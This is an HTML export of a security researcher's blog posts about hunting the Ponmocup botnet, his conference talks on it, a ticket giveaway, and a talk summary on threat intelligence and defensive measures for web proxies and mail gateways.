( 0 minutes ago )
</td></tr>
</tbody></table>
<br />
<br />
I wonder who will be the "first" to detect these <a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">.htaccess infections</a>... anyone? No? OK then...<br />
<br />
If you're not familiar with the Ponmocup malware / botnet yet, my <a href="http://c-apt-ure.blogspot.com/2013/12/ponmocup-hunter-is-re-tired.html" target="_blank">previous post</a> may be a good starting point linking all together.<br />
<br />
Yours truly,<br />
<br />
Ponmocup Hunter :-)<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-22308504413694972052013-12-15T12:34:00.000-08:002014-01-30T12:42:32.717-08:00Ponmocup Hunter is (re-)tired<span style="color: red;"><b>Update: Video from BotConf talk available now :-)</b><i><span style="color: black;"> (see below)</span></i><b><br /></b></span><br />
<br />
For over two and a half years now, since March 2011, I've been researching and analysing this Ponmocup malware, which has so many different names. During this time I've written several blog posts, malware analyses [<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/" target="_blank">1</a>, <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/" target="_blank">2</a>], a "<a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Ponmocup Finder</a>" tool and published (CIF) feeds of malware domains.<br />
<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">"Ponmocup Hunter" SANS DFIR Summit 2013</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a> </li>
</ul>
<br />
This year I have given three presentations called "My name is Hunter, Ponmocup Hunter", and each talk was different in some ways. To get the most out of all you may want to view the slides in chronological order, or you can just skip to the latest and most complete one from BotConf (although previous ones had more details about certain things).<br />
<br />
<ul>
<li>SANS DFIR Summit, Austin Texas, July 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDTW9xLXZTeE5lNzg/edit?pli=1" target="_blank">PDF slides</a>, <a href="http://computer-forensics.sans.org/summit-archives/DFIR_Summit/My-Name-is-Hunter-Ponmocup-Hunter-Tom-Ueltschi.pdf" target="_blank">alt. link</a>)</li>
<li>DeepSec conference, Vienna Austria, November 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDREx3YTlBY2w2c1k/edit?pli=1" target="_blank">PDF slides</a>, <a href="https://deepsec.net/docs/Slides/2013/DeepSec_2013_Tom_Ueltschi_-_My_Name_Is_Hunter,_Ponmocup_Hunter.pdf" target="_blank">alt. link</a>)</li>
<li>BotConf conference, Nantes France, December 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDN3VzNlNlaDdDMlk/edit?pli=1" target="_blank">PDF slides</a>, video maybe soon)</li>
</ul>
<br />
The BotConf talk was video recorded and hopefully soon I will be able to review the video and decide if I want to release it or not. (<a href="https://twitter.com/c_APT_ure" target="_blank">Tweet me</a> if you would like to see it for sure)<br />
<br />
I recieved some very nice feedback after every presentation, here one of my favorite one:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UN3pjCbeBDU/Uq4MJeBHcMI/AAAAAAAAAMk/al-rKlJyLu8/s1600/twitter-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-UN3pjCbeBDU/Uq4MJeBHcMI/AAAAAAAAAMk/al-rKlJyLu8/s400/twitter-1.png" height="217" width="400" /></a></div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<i>(<a href="https://twitter.com/cedricpernet/status/408894733164244993" target="_blank">Twitter link</a>)</i></div>
<br />
<br />
My public work is done (at least for a while, who knows), but the fight against this botnet has just begun. If you have first hand knowledge about this malware (most commonly known probably as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Vundo#tab=2" target="_blank">Vundo</a>) please ask to join the <a href="https://groups.google.com/group/ponmocup-botnet-working-group" target="_blank">Ponmocup Botnet Working Group</a> which has been formed for this reason.<br />
<br />
<b>Update 2013-12-29:</b><br />
<br />
There have been some great blog posts about the delivery of Ponmocup called Zuponcic Kit:<br />
<br />
<ul>
<li><a href="http://malwageddon.blogspot.nl/2013/06/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another Exploit Kit" (Part 1)</a></li>
<li><a href="http://malwageddon.blogspot.nl/2013/08/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another... wait, what!?" (Part 2)</a></li>
</ul>
by <a href="https://twitter.com/malwageddon" target="_blank">Malwageddon</a><br />
<br />
<ul>
<li><a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">Not quite the average exploit kit: Zuponcic</a> <b>< Must Read !</b></li>
</ul>
<br />
by <a href="https://twitter.com/maartenvdantzig" target="_blank">Maarten van Dantzig</a>, <a href="https://twitter.com/ydklijnsma" target="_blank">Yonathan Klijnsma</a> & Barry Weymes (Fox-IT)<br />
<br />
In February at <a href="http://www.kaspersky.com/about/events/industry/sas2013" target="_blank">SAS2013</a> Eugene Aseev from Kaspersky Labs presented "<a href="http://media.kaspersky.com/en/Events/Presentations/Evgeny%20Aseev_The%20Hidden%20bot.pdf" target="_blank">The Hidden Bot</a>", which also highlights the fact, that this malware / botnet is not well known and researched (yet). Unfortunately, the PDF doesn't show all details from the presentation, so if you would like the full-featured PPT version, please contact Eugene or me.<br />
<br />
This post is a work in progress mostly just to link to my presentations and I will update it for a while, when new details become available.<br />
<br />
<b>Update 2014-01-30:</b><br />
<br />
The video recorded from my latest "Ponmocup Hunter" talk at BotConf has been made publically available. Thanks to <a href="https://twitter.com/udgover" target="_blank">Frederic</a> (@udgover) for the hard work put into making the video.<br />
<br />
Just a couple warnings before linking to the video:<br />
<br />
1) I don't consider myself a great nor experienced speaker. I was still very nervous for every talk, but during the talk it got better.<br />
<br />
2) I had a very hoarse voice during my BotConf presentation because I was talking too much and too loud the night before with many great speakers and attendees at the dinner event.<br />
<br />
So hopefully you keep this in mind when watching the video and can see past it. I was giving the talk because I wanted to make more people aware of this botnet, and looking at the activity in my working group I think I succeeded with that.<br />
<br />
So without further ado, I hope you like the <b><a href="http://www.dailymotion.com/video/x1acb8u_17-tom-ueltschi-my-name-is-hunter-ponmocup-hunter_tech" target="_blank">video</a></b> !<br />
<br />
Also check out the other <a href="https://www.botconf.eu/index.php/schedule/" target="_blank">BotConf videos</a> available.<br />
<br />
I also like <a href="http://www.flickr.com/photos/deepsec/11836716103/in/set-72157639552146293" target="_blank">this picture</a> from my talk at DeepSec :-)<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-66146820031347305972013-06-25T15:58:00.000-07:002013-06-26T13:09:48.082-07:00Free DFIR Summit ticket contest<span style="color: red;"><b>Sorry guys and gals, the contest ended prematurely and a winner has been chosen and notified already. So no more submissions will be processed.</b></span><br />
<br />
<br />
This may end up being just a temporary blog post for this one reason...<br />
<br />
SANS generously offered me a complementary <a href="http://www.sans.org/event/dfir-summit-2013/" target="_blank">DFIR Summit</a> ticket to invite someone ("my guest"). So I'd like to pass this on to someone who deserves it and otherwise couldn't attend the Summit.<br />
<br />
So if you would really like to attend the DFIR Summit (to see <a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">my talk</a>) and your employer is not paying for it and you can't afford the $1995 then you should enter the contest or raffle or what should I call it. Also, if you are going to the summit, but a colleague can't go, you can refer them here as well.<br />
<br />
There are some requirements to qualify:<br />
<br />
You need to be able to attend the Summit on July 9 and 10 in Austin TX. You need to pay for travel and hotel room yourself.<br />
<br />
And this requirement from SANS directly:<br />
<br />
"The only requirements are that your guest be recommended by you personally, and your guest must <a href="http://www.omnihotels.com/FindAHotel/AustinDowntown/MeetingFacilities/SANSInstitute7.aspx" target="_blank">reserve his/her own room</a> at the event hotel. (Note: This special offer applies only to NEW hotel reservations, not existing ones.)"<br />
<br />
<b>An Omni hotel reservation must be made before July 1st !</b><br />
<br />
Additionally, use the comment form from this post to apply for the free ticket <b>before Saturday morning</b> and give me the best reason why you deserve it... (any or all of the follwing)<br />
<br />
<br />
<ul>
<li>give your full name, twitter handle, blog URL or whatever to show your identity </li>
<li>list contributions to or collaborations with the DFIR (or IT-sec in general) community with examples</li>
<li>list any other good reason you can think of</li>
<li>how many adult beverages you're gonna buy me at the summit ;-)</li>
</ul>
<br />
If you want to share some information only with me and not publically, please clearly state (<private>which part</private>) in your comment, since they are moderated.<br />
<br />
I will decide on Saturday evening (10 pm UTC+2) who will get the spot and notify them. Hotel booking would need to be done on Sunday.<br />
<br />
I just like to give someone a chance to attend the DFIR Summit who otherwise could not.<br />
<br />
So please spread the word and may the best (most deserving) person win the free ticket!<br />
<br />
Cheers!<br />
<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-12587046424815899572013-05-30T14:54:00.000-07:002013-11-27T15:19:27.076-08:00"Ponmocup Hunter" SANS DFIR Summit 2013<b>Update: </b>the presentation slides have been online for a while [<a href="http://computer-forensics.sans.org/summit-archives/DFIR_Summit/My-Name-is-Hunter-Ponmocup-Hunter-Tom-Ueltschi.pdf" target="_blank">PDF Link</a>].<br />
I've given a newer version of this talk at <a href="http://blog.deepsec.net/?p=1695" target="_blank">DeepSec</a> and <a href="https://www.botconf.eu/index.php/programme-preliminary/my-name-is-hunter-ponmocup-hunter-tom-ueltschi/" target="_blank">BotConf</a>. Slides will be linked when made public. <br />
<br />
I'm thrilled to give a presentation "My name is Hunter, Ponmocup Hunter" in July at the SANS DFIR Summit 2013 in Austin, Texas. (<a href="http://www.sans.org/event/dfir-summit-2013" target="_blank">Summit</a> / <a href="https://www.sans.org/event-downloads/30107/agenda.pdf" target="_blank">Agenda</a>).<br />
<br />
<div data-canvas-width="54.169601614379886" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 96.032px; top: 211.067px; transform-origin: 0% 0% 0px; transform: scale(0.933959, 1);">
<span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">Abstract:</span></span></div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 150.107px; top: 211.067px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 144.027px; top: 231.707px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<div data-canvas-width="282.35904841495517" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 144.027px; top: 478.787px; transform-origin: 0% 0% 0px; transform: scale(0.944345, 1);">
<span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">In early 2011 we discovered some botnet malware infected systems in our network. Starting from one A/V event we discovered several host- and network-based indicators to identify and confirm several infections. A brief high-level overview of the security architecture will help you understand how the indicators could be found and searched for. With a one-strike remediation all infected systems were quarantined and cleaned. A few weeks later the sinkholing of several known C&C domains showed the botnet was very big (several million bots). Quickly I got obsessed with analyzing and hunting this malware, which could infect fully patched systems without using exploits (only social engineering) and protected by firewalls, IPS and multi-layered A/V. The malware got some visibility and media attention in June 2012 with titles such as "printer virus", "printer bomb" or "Trojan.Milicenso: A Paper Salesman’s Dream Come True". This was likely due to an unwanted side-effect or "mistake" by the bot-master and probably didn't happen to all infected hosts or networks.</span></span></div>
<div data-canvas-width="282.35904841495517" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 144.027px; top: 478.787px; transform-origin: 0% 0% 0px; transform: scale(0.944345, 1);">
</div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 426.467px; top: 478.787px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 144.027px; top: 499.427px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<div data-canvas-width="70.33216209606171" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 144.027px; top: 520.093px; transform-origin: 0% 0% 0px; transform: scale(0.963454, 1);">
<span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">You'll learn:</span></span></div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 214.267px; top: 520.093px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-size: 14.72px; left: 148.507px; top: 540.573px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<ul>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">how the malware was discovered, what indicators were derived</span></span></li>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">how all infected hosts were identified and how remediation was done</span></span></li>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">how this malware spreads and how to defend against it</span></span></li>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">how to detect infected systems (host & network indicators)</span></span></li>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">how to find infected web servers used to spread it</span></span></li>
<li><span style="font-family: Verdana,sans-serif;"><span style="color: #20124d;">what malware functionalities are known and currently still unknown</span></span></li>
</ul>
<div data-canvas-width="3.326720099143982" data-font-name="g_font_p0_2" dir="ltr" style="font-family: sans-serif; font-size: 14.72px; left: 558.173px; top: 643.613px; transform-origin: 0% 0% 0px; transform: scale(0.83168, 1);">
</div>
<br />
If you can attend the DFIR Summit and haven't registered yet, you can use the discount code "Swiss10" to get 10% off.<br />
<br />
In the mean time, if you're not familiar with the Ponmocup Malware yet, you can read my previous posts:<br />
<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a> </li>
</ul>
<div class="post-title entry-title" itemprop="name">
There are some more "Threat Intelligence" feeds available, beside the ones that have previously been listed:</div>
<div class="post-title entry-title" itemprop="name">
<br /></div>
<div class="post-title entry-title" itemprop="name">
Lists of Malware Domains and IPs (pre- and post-infection) [CIF usable]</div>
<div class="post-title entry-title" itemprop="name">
<span style="font-size: small;"><span style="font-family: "Courier New",Courier,monospace;"><span style="color: black;"><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt</a></span></span></span><b><br /></b></div>
<br />
Now there's also a list for:<br />
<a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-infected-domains-CIF-latest.txt" target="_blank">Malware redirection servers and .htaccess infected web servers</a> [CIF]<br />
<br />
Ponmocup-Finder output:<br />
<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest.txt" target="_blank">Currently infected websites</a> (redirecting to Malware downloads)<br />
<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-uniq-infected-days.txt" target="_blank">History of all infected websites</a> (first and last seen)<br />
<br />
For more details you can follow me on Twitter (<a href="https://twitter.com/c_APT_ure" target="_blank">@c_APT_ure</a>) or look for <a href="https://twitter.com/search?q=%23Ponmocup&src=hash" target="_blank">#Ponmocup</a> tweets.<br />
<br />
If you would like to get involved with analyzing or fighting this Malware / Botnet please get in touch with me.<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-48633810197744326232012-09-10T15:31:00.000-07:002013-01-07T23:47:53.535-08:00DeepINTEL 2012The first DeepINTEL conference is over and it was great with a fairly small crowd, where you got to meet and talk to everyone.<br />
<br />
Andrew Barrat, who was giving a talk about "<i>Better Breach Disclosure = Better Risk Management?</i>" wrote a couple of blog posts about other talks (<a href="http://makeitcompliant.blogspot.co.uk/2012/09/deep-intel.html" target="_blank">day 1</a>, <a href="http://makeitcompliant.blogspot.co.uk/2012/09/deep-intel-day-two.html" target="_blank">day 2</a>).<br />
<br />
So for those who couldn't attend DeepINTEL, here's a high level overview of the topics, concepts and resources I gave in my talk, which was tittled "<i>Preventing and Detecting Mass-Malware and Advanced Threats</i>".<br />
<br />
Here's the abstract that was given for CFP:<br />
<br />
<blockquote class="tr_bq">
<i>Your organization has firewalls, network IDS/IPS, anti-virus on multiple layers, maybe even HIPS, hardening and patching done and feels pretty safe and secure. But lots of companies and organizations who got breached had all that too. So maybe that’s not enough for today’s threats any more? This speech should give you lots of new intelligence resources to know who are the different threat actors, what are their motivations and techniques, what vulnerabilities are exploited by what threat actors, and some (maybe more or less unconventional) methods for prevention or detection of these threats. Most resources used are freely available, some need free registration and some are from personal work experience.</i></blockquote>
<br />
As a brief introduction to what I think is missing, I introduced the <a href="http://www.ren-isac.net/ses/" target="_blank">Security event System</a> (SES) and <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF) project from REN-ISAC.<br />
<br />
The introduction about me and why I like to share malware and threat intelligence contained references to SANS ISC blog diaries (<a href="http://isc.sans.edu/diary.html?storyid=6805" target="_blank">1</a>, <a href="http://isc.sans.edu/diary.html?storyid=7879" target="_blank">2</a>, <a href="http://isc.sans.edu/diary.html?storyid=10168" target="_blank">3</a>), Mila's contagio malware dump <a href="http://contagiodump.blogspot.com/2010/08/cve-2009-3867-cve-2008-5353-java-low.html" target="_blank">blog post</a> and a couple posts on Kyle's threatthoughts blog about <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/" target="_blank">sharing</a> <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/" target="_blank">indicators</a>, that were based on information I collected and provided to them. Another example is the discovery and analysis of the Ponmocup botnet on <a href="http://www.abuse.ch/?p=3294" target="_blank">abuse.ch blog</a>, where I shared a list of C&C domains for sinkholing.<br />
This first part of the talk was also meant to show the limitations of antivirus, because lots of malware samples I discovered had zero or very low (less than 10%) initial detection rates (out of 42 AV scanners on VirusTotal), which I consider pretty bad.<br />
<br />
Next I introduced some terms and concepts like "cyberrisk intelligence", "actionable intelligence" and "cyber-risk data" from the <a href="http://www.rsa.com/innovation/docs/CISO-RPT-0112.pdf" target="_blank">SBIC report Getting Ahead of Andanced Threats</a>.<br />
This report contains several "charts" (though I'd call it more tables) of such cyber-risk data along with examples. The first table about "<i>cyber attack indicators</i>" gives interesting examples like "<i>description of spear phishing mails</i>", "<i>lists of domains hosting malware</i>" and "<i>set of binaries used by attackers</i>" (which for example could be file hashes like MD5 etc).<br />
<br />
Then I used two quotes from Richard Beitlich's posts on Mandiant's M-unition blog, which I like.<br />
In a post about "<a href="https://blog.mandiant.com/archives/3055" target="_blank"><i>understanding each type of targeted attacker</i></a>" he says: <br />
"<i style="color: blue;">When trying to defend an organization, it’s imperative to understand the nature of the threats who seek to compromise the enterprise. This is not a common belief, unfortunately.</i>"<br />
In another post about "<a href="https://blog.mandiant.com/archives/3127" target="_blank"><i>understanding state-serving adversaries</i></a>" he wrote:<br />
"<i style="color: blue;">A hallmark of a disciplined adversary, however, is to only use the level of “force” required to accomplish the mission, only escalating when the minimum fails to get the desired result. This is the true definition of "advanced," because it means the adversary knows how to properly deploy resources against a target.</i>"<br />
<br />
Elaborating on the different types of threat actors I used resources from Mandiant's <a href="http://www.mandiant.com/resources/m-trends/" target="_blank">M-trends 2012 report</a>, SANS Cyber Attack Threat Map <i>(page 2 from 20 Critical Security Controls poster 2010 -- not found online anymore)</i>, and <a href="http://go.secureworks.com/advancedthreats" target="_blank">Dell SecureWorks Advanced Threat Resource Center</a>.<br />
The presentation "<a href="http://www.slideshare.net/brycegalbraith/why-are-our-defenses-failing-one-click-is-all-it-takes" target="_blank">Why Are Our Defenses Failing Us? One Click Is All It Takes</a>" from Bryce Galbraith gives a very detailed and technical analysis, how little it takes to get breached.<br />
<br />
To give some examples and history of APT attacks I used the paper "<a href="http://www.commandfive.com/papers/C5_APT_ADecadeInReview.pdf" target="_blank">Advanced Persistent Threats: A Decade in Review</a>" from <a href="http://www.commandfive.com/research.html" target="_blank">Command5</a> and the hackmaggedon.com site about "<a href="http://hackmageddon.com/2012-cyber-attacks-timeline-master-index/" target="_blank">Cyber Attacks Timeline</a>".<br />
The next point I was trying to make is the importance of knowing what exploits are being used by what threat actors. An <a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html" target="_blank">overview of exploits kits</a> (also called browser exploit packs / BEP) has been updated frequently on Mila's<a href="http://contagiodump.blogspot.com/" target="_blank"> contagio malware dump blog</a>. This blog is also great to find out what exploits (see categories / labels) are used and find malicious document samples from targeted attacks.<br />
<br />
Another great resource giving details about what exploits are used for APT attacks is a <a href="http://blog.xecure-lab.com/2012/07/prepare-for-advanced-persistent-threat.html" target="_blank">blog post from Xecure Lab</a>. Also from this company is <a href="http://scan.xecure-lab.com/" target="_blank">XecScan</a>, an online scan service for spear phishing document analysis. It's also a great OSINT source for indicators (MD5 hashes, C&C domains / IPs etc.) of APT spear phishing documents.<br />
<br />
The next topic was "<a href="http://windowsir.blogspot.com/2012/03/need-for-analysis-in-intelligence.html" target="_blank">the need for analysis in Intelligence-Drive Defense</a>" from the Windows-IR blog which gives a nice summary of Dan Guido's paper "A case study of intelligence driven defense" and the <a href="http://www.trailofbits.com/resources/exploit_intelligence_project_paper.pdf" target="_blank">Exploit Intelligence Project</a> (<a href="http://www.isecpartners.com/storage/docs/presentations/EIP-2.0.pdf" target="_blank">EIP</a>).<br />
<br />
The paper "<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/iciw2011.pdf" target="_blank">Intelligence Driven CND Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains</a>" introduces the "<i>intrusion kill chain</i>" and "<i>kill chain phases</i>" along with the definition of "<i>late phase detection</i>" (C2) versus "<i>early phase detection</i>" (delivery).<br />
<br />
So what's the relevance of all this? What do I make of it?<br />
<br />
Well, patching and updating all software, especially OS, browser and all browser plugins (Java, Flash, Adobe Reader etc.) should be a very high priority. But some software, like Java with all its dependencies, are hard(er) to be patched very timely in some enterprises.<br />
<br />
So here are some suggestions for additional mass-malware prevention on a web proxy:<br />
<ul>
<li>implement a Java whitelist, allowing Java from trusted domains only (user-agent based)</li>
<li>limit executable downloads (magic bytes) to trusted domains (or categories if available)</li>
<li>block all malicious IPs, IP ranges, 1st level domains (esp. dyndns) as possible and business allows (start using CIF with many feeds)</li>
</ul>
<br />
And additional protection for a mail gateway:<br />
<ul>
<li>block or strip all executable (magic bytes) attachments, also inside ZIP or RAR files</li>
<li>keep mail logs of A/V events (with context) for a long period</li>
</ul>
<br />
Detecting a series of targeted attacks:<br />
<br />
Knowing what exploits (CVE's) have been used for targeted attacks I spotted a single A/V event (containing "CVE-2011-0611" SWF exploit) from a PDF email attachment amongst hundreds other mass-malware events. Now knowing the targeted person I found previous attack mails using CVE-2009-3129 inside a XLS and an unknown exploit inside a PDF with JavaScript. Monitoring the mails of the targeted person I found a IMG-SRC in an HTML mail without attachments. The URL was using a domain hosted on the same IP that was used for C2 of the previous PDF/SWF exploit and contained the target's email address in it. The attack series continued with a number of DOC attachments with CVE-2012-0158 exploits, some of which were very similar to the ones described on this <a href="http://www.securelist.com/en/blog/208193631/A_Gift_for_Dalai_Lamas_Birthday" target="_blank">Securelist blog</a>.<br />
<br />
The above are of course just some examples of additional prevention and detection measures you can put in place.<br />
<br />
Some other projects, collaboration groups and tools you may want to look at are:<br />
<ul>
<li><a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF) / <a href="http://holisticinfosec.blogspot.com/2012/07/toolsmith-collective-intelligence.html" target="_blank">Toolsmith </a></li>
<li><a href="http://www.mandiant.com/resources/downloads/" target="_blank">Mandiant's tools</a> from <a href="http://blogs.sans.org/computer-forensics/files/2012/06/SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf" target="_blank">DFIR poster</a></li>
<li><a href="http://openioc.org/" target="_blank">OpenIOC</a></li>
<li><a href="http://www.deependresearch.org/2012/08/yara-signature-exchange-google-group.html" target="_blank">YARA exchange group</a></li>
<li><a href="http://malwaremustdie.blogspot.jp/2012/08/the-raise-of-malware-crusaders.html" target="_blank">#MalwareMustDie blog</a> / <a href="https://twitter.com/MalwareMustDie" target="_blank">twitter</a></li>
</ul>
<br />
Feedback is always welcome!<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-51373420917710771992012-07-02T15:27:00.001-07:002012-07-02T15:27:14.954-07:00Intelligence-driven SecurityIs "Intelligence-driven security" the next big thing?<br />
<br />
In my <a href="http://c-apt-ure.blogspot.com/2010/03/first-blog-first-post.html" target="_blank">first blog post</a> I put a link to Deloitte's paper "<a href="http://www.deloitte.com/assets/Dcom-UnitedStates/Local%20Assets/Documents/AERS/us_aers_Deloitte%20Cyber%20Crime%20POV%20Jan252010.pdf" target="_blank">Cyber crime: a clear and present danger -- Combating the fastest growing cyber security threat</a>". Just recently I looked over it again and stopped at page 12: "<i>Developing “actionable” cyber threat intelligence</i>" and "<i>Cyber Threat Intelligence Collection Research, and Analysis Process</i>" -- a great picture. That's an old paper.<br />
<br />
I really like the recent "Getting ahead of Advanced Threats" report from Security for Business Innovation Council (sponsored by RSA).<br />
<br />
Report PDF: <a href="http://www.rsa.com/innovation/docs/CISO-RPT-0112.pdf" target="_blank">Getting Ahead of Advanced Threats</a><br />
<br />
Youtube video: <a href="http://www.youtube.com/watch?v=3mCfO4npfyU" target="_blank">Getting Ahead of Advanced Threats: Achieving Intelligence-driven Security</a><br />
<br />
Blog series about Deconstructing SBIC's "Getting Ahead of Advanced Threats" Report:<br />
<br />
<ol>
<li><a href="http://www.internetidentity.com/news/blog/565-deconstructing-rsas-getting-ahead-of-advanced-threats-reportinformation-vs-intelligence" target="_blank">Information vs Intelligence</a></li>
<li><a href="http://www.internetidentity.com/news/blog/569-deconstructing-rsas-getting-ahead-of-advanced-threats-reportthe-importance-of-the-extended-enterprise" target="_blank">The Importance of the Extended Enterprise</a></li>
<li><a href="http://www.internetidentity.com/news/blog/573-deconstructing-sbics-getting-ahead-of-advanced-threats-reportintelligence-driven-information-security" target="_blank">Intelligence-Driven Information Security</a></li>
<li><a href="http://www.internetidentity.com/news/blog/574-deconstructing-sbics-getting-ahead-of-advanced-threats-reportbuilding-sources" target="_blank">Building Sources</a></li>
<li><a href="http://www.internetidentity.com/news/blog/582-deconstructing-sbics-getting-ahead-of-advanced-threats-reporttaking-action" target="_blank">Taking Action</a></li>
<li><a href="http://internetidentity.com/news/blog/594-deconstructing-sbics-getting-ahead-of-advanced-threats-reporta-day-in-the-life-fighting-cybercrime" target="_blank">A Day In The Life Fighting Cybercrime</a></li>
</ol>
As I have mentioned in a previous post, something to really look out for is the <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF). Take a look at the <a href="http://code.google.com/p/collective-intelligence-framework/wiki/CommunityExamples" target="_blank">Community examples</a> and maybe even the <a href="http://code.google.com/p/collective-intelligence-framework/wiki/ProjectAvenger" target="_blank">Avenger Project</a>.<br />
<br />
